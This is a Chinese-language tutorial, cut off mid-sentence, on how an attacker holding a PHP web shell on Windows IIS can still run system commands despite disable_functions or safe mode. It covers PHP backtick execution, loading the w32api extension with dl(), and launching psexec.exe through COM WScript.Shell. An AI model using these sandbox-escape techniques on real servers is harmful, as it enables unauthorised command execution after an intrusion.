<p> 从WIN2000到WIN XP, 再到WIN2003, MS IIS服务器安全性的提高是显而易见的。 在WIN2000中, 一个普通的PHP SHELL便能把它打垮; 在WIN XP, 即使Safe mode = off,你也无法用system() 等函数执行系统命令, 但是我们还能用com()函数进行突破;到WIN 2003,即使IIS 和PHP都是默认安装,你用system(), com()也可能拿它没辙。这时候你就不得不使用一些新的方法来进行突破了。</p><p> 1、disable_functions的突破</p><p> 在php -4.0.1以上的版本,php.ini里引入了一项功能disable_functions , 这个功能比较有用,可以用它禁止一些函数。比如在php.ini里加上disable_functions = passthru exec system popen 那么在执行这些函数的时候将会提示Warning: system() has been disabled for security reasons,同时程序终止运行。但是也不是没有办法执行系统命令了。因为php采用了很多perl的特性,比如还可以用(`)来执行命令,示例代码如下:</p><code><?<br />$output = `ls -al`;<br />echo "<pre>$output</pre>";<br />?></code><p> 据说这个只有设成safe_mode为on才能避免,但上次我在一台国外的服务器上使用的时候还是失败了,人并不是什么时候都能那么走运的:)</p><p> 2、dl()函数的应用</p><p> 当任何PHP的内部命令执行数和''都无法使用的时候,可以尝试dl(),该方法只能用于safe mode=off, 因为它在安全模式下是被禁用的。利用dl()你可以直接调用W32api 函数,可惜这个扩展已被移动到 PECL 库中,且自PHP 5.1.0以下版本起不再被绑定。以下是手册里的例子:</p><code>// 加载此扩展<br />dl("php_w32api.dll");<br />// 注册 GetTickCount 函数,来自 kernel32.dll<br />w32api_register_function("kernel32.dll",<br />"GetTickCount",<br />"long");<br />// 注册 MessageBoxA 函数,来自 User32.dll<br />w32api_register_function("User32.dll",<br />"MessageBoxA",<br />"long");<br />// 取得开机时间信息<br />$ticks = GetTickCount();<br />// 转换为易于理解的文本<br />$secs = floor($ticks / 1000);<br />$mins = floor($secs / 60);<br />$hours = floor($mins / 60);<br />$str = sprintf("You have been using your computer for:".<br />"<br />%d Milliseconds, or<br />%d Seconds".<br />"or<br />%d mins or<br />%d hours %d mins.",<br />$ticks,<br />$secs,<br />$mins,<br />$hours,<br />$mins - ($hours*60));<br />// 显示一个消息对话框,只有一个 OK 按钮和上面的开机时间文本<br />MessageBoxA(NULL,<br />$str,<br />"Uptime Information",<br />MB_OK);<br />?></code><p> 可惜我还没有理解透彻dl()和W32api, 所以就不乱举例子了, 免得误导读者。</p>
<p> </p>
<p> 3、COM 和 .Net(Windows)函数的应用</p><p> COM(Component Object Model,组件对象模型)是微软开发的软件规范,它用于开发面向对象的、编译好的软件组件,它允许把软件抽象成为二进制的部件,主要运用于windows平台。</p>PHP 的 Windows 版本已经内置该扩展模块的支持。无需加载任何附加扩展库即可使用COM函数。它的使用方法类似于C++或Java中类的创建的语法,并把COM的类名作为参数传递到构造函数。例如使用在PHP中调用“WScript.Shell”执行系统命令:</p><code><?<br />$cmd=” E:/cert/admin/psexec.exe”;<br />if($com=new COM("WScript.Shell")) echo "yes";<br />if(!$cmd1=$com->exec($cmd))<br />{<br />echo "can not exec()";<br />}<br />if(!$cmd2=$cmd1->stdout())<br />{<br />echo "can not stdout()";<br />}<br />if(!$cmd3=$cmd2->readall())<br />{<br />echo "can not readall()";<br />}<br />echo $cmd3;<br />?></code><p> 图1是我写的一个执行psexec.exe的一个例子。</p><p> 这段代码与ASP的<%=server.createobject("wscript.shell").exec("cmd.exe /c netstat